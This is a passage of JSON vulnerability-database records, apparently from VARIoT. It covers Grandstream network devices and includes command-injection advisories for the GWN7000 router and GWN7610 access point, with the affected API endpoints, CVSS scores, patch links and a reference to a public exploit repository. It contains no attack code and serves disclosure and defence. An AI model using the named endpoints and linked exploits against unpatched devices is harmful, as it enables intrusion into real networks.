"date": "2021-03-31T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"date": "2021-12-01T08:40:00",
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"date": "2022-10-05T16:40:31.590000",
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"date": "2022-07-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream\u00a0GRP261x\u00a0VoIP\u00a0phone\u00a0 Authentication vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
],
"trust": 0.6
}
}
VAR-201903-1399
Vulnerability from variot - Updated: 2023-12-18 13:18Grandstream GWN7000 before 1.0.6.32 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the filename in a /ubus/uci.apply update_nds_webroot_from_tmp API call. Grandstream GWN7000 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GWN7000 is an enterprise VPN router from Grandstream.
There are security vulnerabilities in Grandstream GWN7000 versions prior to 1.0.6.32. An attacker could use this vulnerability to execute an illegal command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1399",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gwn7000",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.6.32"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gwn7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.6.32",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gwn7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10656"
}
]
},
"cve": "CVE-2019-10656",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-10656",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-42883",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10656",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10656",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-42883",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1221",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7000 before 1.0.6.32 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the filename in a /ubus/uci.apply update_nds_webroot_from_tmp API call. Grandstream GWN7000 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GWN7000 is an enterprise VPN router from Grandstream. \n\nThere are security vulnerabilities in Grandstream GWN7000 versions prior to 1.0.6.32. An attacker could use this vulnerability to execute an illegal command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "CNVD",
"id": "CNVD-2019-42883"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10656",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-42883",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"id": "VAR-201903-1399",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
}
]
},
"last_update_date": "2023-12-18T13:18:48.615000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream GWN7000 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192493"
},
{
"title": "Grandstream GWN7000 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90905"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 1.6,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10656"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10656"
},
{
"trust": 0.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl;=1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"date": "2019-03-30T17:29:00.433000",
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42883"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003084"
},
{
"date": "2023-03-01T14:46:53.753000",
"db": "NVD",
"id": "CVE-2019-10656"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7000 Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003084"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1221"
}
],
"trust": 0.6
}
}
VAR-201903-1401
Vulnerability from variot - Updated: 2023-12-18 13:18Grandstream GWN7610 before 1.0.8.18 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the filename in a /ubus/controller.icc.update_nds_webroot_from_tmp update_nds_webroot_from_tmp API call. Grandstream GWN7610 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GWN7610 is a wireless access point device from Grandstream.
There are security vulnerabilities in Grandstream GWN7610 versions prior to 1.0.8.18. An attacker could use this vulnerability to execute an illegal command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1401",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gwn7610",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.8.18"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gwn7610_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.8.18",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gwn7610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10658"
}
]
},
"cve": "CVE-2019-10658",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10658",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-42881",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10658",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10658",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-42881",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1223",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7610 before 1.0.8.18 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the filename in a /ubus/controller.icc.update_nds_webroot_from_tmp update_nds_webroot_from_tmp API call. Grandstream GWN7610 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GWN7610 is a wireless access point device from Grandstream. \n\nThere are security vulnerabilities in Grandstream GWN7610 versions prior to 1.0.8.18. An attacker could use this vulnerability to execute an illegal command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "CNVD",
"id": "CNVD-2019-42881"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10658",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-42881",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"id": "VAR-201903-1401",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
}
]
},
"last_update_date": "2023-12-18T13:18:48.588000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream GWN7610 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192495"
},
{
"title": "Grandstream GWN7610 Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90907"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10658"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10658"
},
{
"trust": 0.8,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920"
},
{
"trust": 0.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl;=1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003019"
},
{
"date": "2019-03-30T17:29:00.527000",
"db": "NVD",
"id": "CVE-2019-10658"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1223"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42881"
},
{
"date": "2019-05-07T00:00:00",
